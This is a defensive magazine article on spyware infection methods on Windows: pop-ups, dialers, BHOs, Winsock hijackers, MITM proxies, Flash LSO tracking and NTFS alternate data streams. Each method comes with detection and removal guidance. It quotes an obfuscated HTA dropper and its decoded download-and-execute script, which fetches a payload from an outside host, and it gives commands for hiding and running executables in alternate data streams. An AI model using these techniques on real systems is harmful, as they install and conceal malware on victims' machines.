Spyware infection methods

Christiaan Beek

The primary purpose of spyware is to collect demographic and usage information, but sometimes also private data. Such programs are usually bundled as a hidden component or downloaded from the Internet unwillingly. They install and run without user knowledge. What's worst, most antivirus packages ignore them. Let's see what methods such programs use to infect Windows systems and how can one protect oneself against them.

Recent results from a research by known organizations like CSI/FBI show that almost 80 percent of computer systems are infected by spyware. The amount of spyware is still growing due to the fact that authors of spyware are using more and more new technology skills. As it is a very lucrative business, organised crime invests in people and technology. For organisations, it's difficult to protect against this threat. On the one hand, they have to implement a solution that will prevent infection, but on the other, this solution must also be capable of cleaning already infected computer systems.

Let's have a closer look at techniques that spyware currently uses for infecting Windows systems. With each technique discribed, we'll also mention solutions to detect and avoid infection and to remove the threat. This article should not be treated as a complete compendium on spyware, but rather a look at few interesting techniques that were developed with the invention of spyware for its own purposes, and at manual methods of protection against those techniques, as automated tools are not always able to help the users in this respect.

Spyware species

Pop-ups

Pop-ups are used to trick the user to click on them. They can be contained on websites, in e-mail, attached to other software or can have a form of toolbars installed as plug-ins for Internet Explorer. Lots of peer-to-peer software contains such software. For example KaZaA includes GAIN (Gator) and Cydoor. GAIN monitors surfing habits and downloads advertisements from the Internet, presenting them in KaZaA. Cydoor downloads a big list of URLs during KaZaA installation and shows these URLs later, when you're browsing the Internet.

Another type of pop-up spyware uses the Messenger service in Windows and shows text advertisements (see Figure 1). Windows NT/XP/200x users can easily avoid this by disabling the Messenger service.

Dialers

Dialers usually secretly change the dial-up connection settings, so that instead of calling a local Internet provider, the user's call is routed to a very expensive international connection. They are most often used as a payment method for accessing websites with game and adult content. When installing browsers, usually user consent is required (see Figure 2).

Browser hijackers

Browser hijackers change the browser settings without user permission. Usually the home page and search page locations are affected, but often bookmarks are added as well. An example of a nasty collection of browser hijackers is ISTbar. It installs Tinybar tollbar, but can also install other parasites, some of them showing porn pop-ups.

Spying cookies

Cookies, most often legitimately used to enable user identification when returning to a website, can also be exploited as spyware. Some websites use cookies to track surfing habits. These are most often third party cookies - cookies sent not by the website one is viewing (often via advertising banners). Luckily, cookies are not dangerous - they cannot be used to spread other code.

A company like DoubleClick runs banners from its own servers and uses these servers to set and read cookies. This way, DoubleClick is able to detect, which customers are visiting which websites where their banners are served.

Figure 1. A typical Messenger pop-up add

Figure 2. Users often install dialers by their own consent

Object Data Tags

Object Data Tags are tags that specify the data and parameters for objects inserted into HTML documents and the code that can be used to display/manipulate that data. A remote attacker could create a crafted URL link using the Object Data Tags to be executed in the victim's web browser within the security context of the hosting site, once the link is clicked. The attacker exploits this vulnerability by creating a malicious webpage, cracking an existing webpage, or by sending it to a victim as an HTML e-mail.

A practical example

Let's have a look at Listing 1 containing part of a data stream captured via an IDS alert. This highly obfuscated code in reality tries to use JavaScript to create a file called q706634.exe on the C:\ partition of the system. The filename looks surprisingly familiar to a Microsoft update file.

Listing 1. Data captured via an IDS alert

 
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 12:27:30 GMTServer: 
Apache/1.3.33 (Unix) mod_deflate/1.0.21
Connection: close Transfer-Encoding: chunked
Content-Type: application/hta <script language=jscript>try{ 
self.moveTo(5000,5000);function b2u(c){var x=""; 
for(w=0;w<c.length;){h=Array();for(e=0;e<8;e++){h[e]= 
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" 
.indexOf(c.charAt(w++));}x+=String.fromCharCode(h[0]<<10|h[1] 
<<4|h[2]/4,h[2]<<14|h[3]<<8|h[4]*4|h[5]>4,h[5]<<12|h[6]<<6|h[7]);}return
x;}g=newActiveXObject("Scripting.FileSystemObject");fname= 
'c:\q706634.exe';t=g.CreateTextFile(fname,true);t.Write('MZ'); 
t.Close();t=g.OpenTextFile((fname),8,false,true);t.Write(b2u( 
"â??â??hkjhfksjdyuiuywejkrwje!`?{}{jiihfsdfhhdhfd[]] 
[kjsdjkajsjkjsd)(qyqm,mniuajkalkdfhksdkjfds78e9893jka89j23o0jl& 
*&kjkjskjdkdf&*jdjfsf98slkdkjq9jaoiu
(...)

A quick look at the functional portion reveals, that data is decoded and written into this file. The executable is then run. An ActiveX component is also inserted into this code. It opens the file on the target machine. Slight alteration of the original script function allows us to write out the decoded content and discover what it does. Listing 2 contains snippets of the output.

Listing 2. Snippets of output from a modified version of spyware link

 
<textarea id="Main_HTA">
<HTA:APPLICATION id=DSD
Applicationname="DSD"
showintaskbar=NO
caption=YES
<IFRAME name="icounter" src="about:blank" widh=8 height=8>IFRAME>
<SCRIPT language="VBSCRIPT">
If Instr(Exploit_Path,"cgi-bin"<>0 then CGI_SCRIPT_PATH=Exploit_PATH 
& "spycheck.cgi"
WinOS=Get_Win_Version
Select Case WinOS
Case "NT"
Call Download_and_Execute (Trojan_Path,Exename, " ",1)
Trojan_Path="http://www.isendyousomenicespyware.com/spikey.exe"

The file q706634.exe is a Win32 executable, 32,367 bytes long. After analysing it with OllyDbg, we can find out some more about what the file does. When spikey.exe is downloaded and executed, it is copied to the WINDOWS\System32 folder under the name hddwizz.exe and installs a key to launch itself in HKLM\Software\Microsoft\Windows\Currentversion\Run. There are also DLLs installed in the same folder. Together, the program is working as a keylogger and sends data using e-mail, which is then deleted.

Several of this type of spyware/trojans were captured via honeypots by the author of the article. They were using the same obfuscation and decoding tricks, working with IFRAME and redirecting techniques.

How to detect/avoid/remove

In order to avoid such infection, the following methods should be used:

• Regular update of Windows - installation of patches.

• ACLs (Access Control Lists) on C:\WINDOWS and C:\WINDOWS\system32 directories to prevent users from installing software in these locations.

• ACLs on the following registry keys to prevent users from adding values (Set Value or Create Subkey):

• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run,

• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce,

• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices,

• HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services.

• Using file integrity software like Tripwire.

If infected, most anti-spyware and antivirus software is able to detect and clean up the mess. However, it is recommended to perform multipe runs with different types of anti-spyware. Hitman Pro (see Inset On the Net) is especially recommended in such case.

Persistent Identification Elements

A company called United Virtualities developed this new technique. According to their website Persistent Identification Element (PIE) is tagged to the user's browser, providing each with a unique ID just like traditional cookie coding. However, PIEs cannot be deleted by any commercially available anti-spyware, mal-ware, or adware removal program. They will even function at the default security setting for Internet Explorer.

United Virtualities have created two types of PIE :

• AccuCounter PIE, a cookie replacement that counts unique users accurately,

• Backup PIE, a PIE that not only counts unique users but also recognizes the visitor and restores any erased cookies.

How does it work

Most browsers, like Firefox and Internet Explorer, are using a zone model to handle cookies. End-users can allow, deny or delete the cookies. To circumvent these restrictions, Local Shared Objects (LSO) are used. These Local Shared Objects are developed by Macromedia for use with their Flash player. These little files are installed by a JavaScript or a Flash plug-in on the system. This type of file has the extension .sol and can be located in a variety of places, usually a sub-directory of \Documents and Settings\{User Name}\Application Data\Macromedia\Flash Player\.After installation they operate like normal cookies.

Unitied virtualities is using these Local Shared Objects and giving them a unique identification number. By this number, an end-user is easily followed around the Internet. Using this technique, when a Web site discovers a cookie missing, it can look for a backup in Flash and restore the cookie.

A practical example

Since United Virtualities does not provide the code, we can try to reconstruct some of it based on the concepts used. Macromedia provides good documentation about writing Local Shared Objects. Using this documentation we can construct code such as seen on Listing 3.

Listing 3. An example of a Local Shared Object

 
// Create an SO
mySO = SharedObject.getLocal("sticky spyware");
// Add some important data
mySO.data.stickAround = "uniqueID=w@nnaspy0nyoursurfing234589712";
// Write the SO to the disk
mySO.flush();
// Delete the SO
delete mySO;
// Reload the SO
mySO = SharedObject.getLocal("test");
// Scan the SO for values
for (a in mySO.data) {
trace(a+": "+mySO.data[a]);
}

As we can see, LSOs are very easy to create. By combining them with JavaScript on a web page, they can easily be injected into a user's browser.

How to detect/avoid/remove

Avoiding PIEs is as easy as changing global Flash settings. For reference on how to use the Settings Manager, it's best to visit the page http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager.html. From this page we can go directly to changing the settings.

Figure 3. Changing Flash settings to avoid PIEs

There are a number of pages where settings on our local computer can be adjusted. First, select Global Security Settings Panel from the left. To prevent any website accessing or storing information on our computer, we must click the Always deny button. It's also a good idea to do the same in the Global Privacy Settings panel.

In order to detect LSOs, we can simply search for files with the .sol extension (see Figure 4). From the results seen, it is clear that some of the entries found come from Web advertisements. However it can also be seen, that many cookies have legitimate purpose. Other members of the Flash MX suite may also use Local Shared Objects.

Figure 4. Files with .sol extension containint Local Shared Objects

We can therefore see, that persistent files are by no means only due to advertising, but may be present for a variety of legitimate reasons. Whilet it might be tempting to stop tracking by using a brute force method of deleting .sol files, there is a better way. Visit the webpage http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager07.html. A Flash application shown on this page shows, which websites are using LSOs (see Figure 5). Now, we can easily remove the elements by deleting the website in the Settings Manager.

Figure 5. A list of websites which stored LSOs on a local machine

Browser Helper Objects

With Browser Helper Objects we can write components (specifically, in-process Component Object Model (COM) components) that Internet Explorer will load each time it starts up. Such objects run in the same memory context as the browser and can perform any action on the available windows and modules. A BHO could access the browser's menu and toolbar and make changes, create windows to display additional information on the currently viewed page, and install hooks to monitor messages and actions. An example of some legal applications using the BHO are toolbars from Google and Yahoo.

How does it work

A BHO is tied to the browser's main window. In practice, this means a new instance of the object is created as soon as a new browser window is created. Any instance of the BHO lives and dies with the browser's instance. BHOs only exist in Internet Explorer, version 4.0 and later.

Figure 6. How do BHOs work

In its simplest form, a BHO is a COM in-process server registered under a certain registry key. Upon startup, Internet Explorer looks up that key and loads all the objects whose CLSID are stored there. The browser initializes the object and asks it for a certain interface. If that interface is found, Internet Explorer uses the methods provided to pass its IUnknown pointer down to the helper object. Because BHOs have unrestricted access to the Internet Explorer event model, some forms of malware have also been created as BHOs.

A practical example

Since writing BHOs involves quite a bit of code, we recommend to have a look at an example, legitimate project done using these techniques: http://www.codeproject.com/atl/popupblocker.asp. Manuals for writing BHOs can be found on the Microsoft MSDN website.

How to detect/avoid/remove

Programs such as BHODemon (see Figure 7 and Inset On the Net) can disable BHO's from launching when Internet Explorer starts. BHODemon can also be used to detect infection and identify the main plug-in file associated with the BHO (typically a .DLL or .OCX file located in the Windows System folder), so that the file can be removed manually.

Figure 7. BHODemon - software for managing BHOs

WinSock hijackers

To chain a program to the WinSock2 implementation, LSPs are used. LSP stands for Layered Service Provider. Since the LSPs are working as a chain when WinSock is used, the data is also transported through each LSP in the chain.

Figure 8. LSPs in the WinSock chain

Spyware using technique called WinSock hijacking reroutes the network traffic to, for example, sites with adult content. An example of such a program is WebHancer (though WebCancer would be a much better name).

A practical example

When analysing such software using the Malcode Analyst Pack from iDEFENSE Labs (see Inset On the Net), the code presented in Listings 4 and 5 is shown using the strings command. These examples show how the proxy uses the WebHancer website by adding and modifying registry keys to reroute the browser traffic.

Listing 4. Analysis of a Winsock hijacker

 
Start Page
SoftwareMicrosoftInternet ExplorerMain
srchost_table_size
plugins
data_timeout
time_offset
data.webhancer.com:80
dc_servers
secondary.webhancer.com:80
sec_auth_server
prime.webhancer.com:80
prim_auth_server
HTTP/1.0

Listing 5. More code found using the Malcode Analyst Pack

 
46F021DC-CB81-4acc-BA1B-9E1B440020D4er
127.0.0.1
localhost
912B4D64-E5A5-4bfc-9808-4CF149F2F965-31
951B13F8-F40D-4c56-BD57-909A968F918B-31
4851F512-58B1-446a-85A0-D944078E9A7D-31
B317949A-EE2E-48e6-BE41-CD5744F706D2-31
6A803934-0F46-489a-B02A-8A6DDFE30BB0-31
74F5FD53-368F-4e0d-805B-4A983826EF91-31
default
%s:%d
RegWhWs2Lsp
Programswebhdll.dll

How to detect/avoid/remove

Trying to remove this kind of programs is very difficult. Before we know it, we might break our Internet connection for good, because we've removed the wrong DLLs. Therefore, it is best to use a dedicated program for this purpose. A good example could be LSP-Fix (see Inset On the Net). To avoid installation of a WinSock hijacker, we can also use a tool called SockLock (see Inset On the Net). This tool prevents modification of WinSock, by locking it.

To detect WinSock hijackers, we can use a tool called Hijack This (see Inset On the Net). Upon running this tool, we will be informed if our WinSock has been hijacked (eg. Hijacked Internet access by New.NetI) or broken (eg. Broken Internet access because of LSP provider 'c:\progra~1\common~2\toolbar\cnmib.dll' missing). Hijack This is, however, incapable of fixing the problem. We still have to use LSP-Fix.

Man-in-the-Middle proxies

Increase your Internet speed by up to 40 percent - wouldn't that be nice? Many users fall for such advertisements and download programs such as MarketScore (the filename is ossproxy). It is recommended never to download and install such programs, since there is a big chance, that in reality the program will route all Internet traffic on our system through dedicated proxy servers (including secure transactions!).

How does it work

The software usually installs a trusted certificate authority. By using the man-in-the-middle method, all traffic is first sent to the man-in-the-middle servers and then towards the destination entered in the URL field of the browser. The owners of these servers easily harvest all data including passwords and other confidential information.

Figure 9. How do man-in-the-middle proxies work

How to detect/avoid/remove

Since most such software is installed willingly by the user, the method to avoid it is simple - don't install.

To detect whether such software is installed, it's necessary to have a tool which shows us the characteristics of our connections. A good tool for this purpose is Active Ports. Figure 10 shows its usage for detecting MarketScore infection. We can clearly see many sessions using the ossproxy.exe file while surfing the Internet.

Figure 10. Detecting Marketscore using Active Ports

Alternate Data Streams

NTFS is the filesystem of choice when installing a Microsoft platform. It offers stability and security plus many interesting mechanisms. One of such mechanisms, Alternate Data Streams (ADS) is used to provide compatibility with the Macintosh Hierarchical File System, storing summary data of a selected file or used for tracking Volume Change. Microsoft doesn't provide tools to detect the presence of code hidden within the ADS streams.

Alternate Data Streams, are only a little bit different from Primary Data Streams. They are handled very differently both by Microsoft and third-party applications on Windows. The biggest difference between primary and alternate data streams is whether an application is capable of detecting an alternate stream, and if it does, how they are accessed.

The data that exists in an alternate stream cannot be deleted in the same way as data in a primary stream,. Each data stream has its own lock attributes, but Windows only pays attention to the lock on the unnamed stream. This is creating a nice vulnerability, in which ADS can be created and edited while being protected from discovery or removal by ADS scanning applications.

The data in an ADS can also be directly executed. At least five ways to execute different types of data are known for Windows 2000. The following scenarios are possible:

• Executing the stream from the Run window as file:\\notepad.exe: works for the .exe stream and the .vbs stream.

• Executing the Visual Basic script from the command line using the Windows Scripting Host by running wscript notepad.exe:.

• Creating a shortcut to notepad.exe: will execute both the .exe and .vbs streams.

• Placing a shortcut to the stream in the Windows Startup folder will cause the .exe and .vbs streams to be executed when a user logs in.

• Adding a test key with value notepad.exe in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run will cause .exe and .vbs streams to be executed on system startup.

Creators of spyware (for example variants of CoolWebSearch) use this kind of technique to hide their malicious code in ADSs. It's very easy to perform, no special tools are needed, a user only needs a stream-aware tool like Notepad to edit/add data.

A practical example

To start with a very simple example:

> type c:\spyware.exe >

c:\winnt\system32\notepad.exe:spyware.exe

will fork the common notepad program with an ADS spyware.exe.

Another example:

> cd C:\

> copy C:\winnt\notepad.exe

C:\notepad.exe

> edit C:\randumb.txt

> type notepad.exe >

randumb.txt:nd.exe

now you can still execute that notepad.exe program from within the text file:

> start C:\randumb.txt:nd.exe

Crackers can also use this technique to install rootkoots, keyloggers on Windows machines after creating a remote shell on the 0wn3d box. By using TFTP, the following files are transferes towards an innocent looking directory C:\WUTemp$dir. Analysis of the stream with tcpdump can be seen on Listing 6.

Listing 6. Malicious software distributed via ADS

 
10.0.0.75.1032 > 10.0.0.77.3733: P [tcp sum ok] 
3530256009:3530256512(503) ack 758422019 win 17303
0x0000     4500 021f 02df 4000 8006 71de c0a8 0165    E.....@...q....e
0x0010     c0a8 0166 0406 10e1 d26b 6e89 2d34 9a03    ...f.....kn.-4..
0x0020     5018 4397 e869 0000 0d0a 3132 2f30 352f    P.C..i....23/09/
0x0030     3230 3034 2020 3039 3a33 3061 2020 2020    2005..22:09a....
0x0040     2020 2020 2020 2020 2020 3332 2c37 3638    ..........32,768
0x0050     2069 7065 7965 2e65 7865 0d0a 3132 2f30    rootkit.exe.23/0
0x0060     352f 3230 3034 2020 3039 3a33 3261 2020    9/2005..22:09a..
0x0070     2020 2020 2020 2020 2020 2020 3332 2c37    ............32,7
0x0080     3638 206b 6c6f 6767 6572 2e65 7865 0d0a    68.keylogger.exe

The C:\WUTemp$dir contains a file called wutest. An attacker then copies the tools into this file to hide them into an alternate data stream:

> type spyware.exe >

wutest:spyware.exe

It is also possible to copy a file into the stream of a directory, such as simply C:\. There are many ways in which an attacker can start programs, such as batch-scripts or the start-command. Recent honeypot analysis shows such attacks being in common use lately.

How to detect/avoid/remove

Unfortunately, Microsoft doesn't provide any tools to detect Alternate Data Streams. There is however third-party software available such as LADS or ADS spy (see Inset On the Net).

Let's see how we can detect and remove ADSs in practice. First, let's create an example stream:

> type c:\temp\spyware.exe.txt >

c:\WINDOWS\system32\calc.exe:spyware.exe.txt

This creates an ADS in the file calc.exe, the calculator. Now let's run ADS spy - Figure 11 shows the results of a system scan. As we can see, ADS spy detected the stream and by selecting it, we can easily remove it using this tool. It's difficult to avoid ADSs, but more and more antivirus vendors are upgrading their tools to enable ADS detection.

Figure 11. Detecting ADSs using ADS spy

Conclusion

To solve spyware problems, anti-spyware software is not enough. An ideal package is not available, so it's best to use a combination of anti-spyware programs from well-known vendors. Of course, keeping the OS updated is also key to success. In some specific cases, third party tools are necessary to fix problems.

On the other hand, can we really stop spyware? Since spyware is a very lucrative business, the battle between writers and defenders will continue, both using and developing new techniques to defeat each other.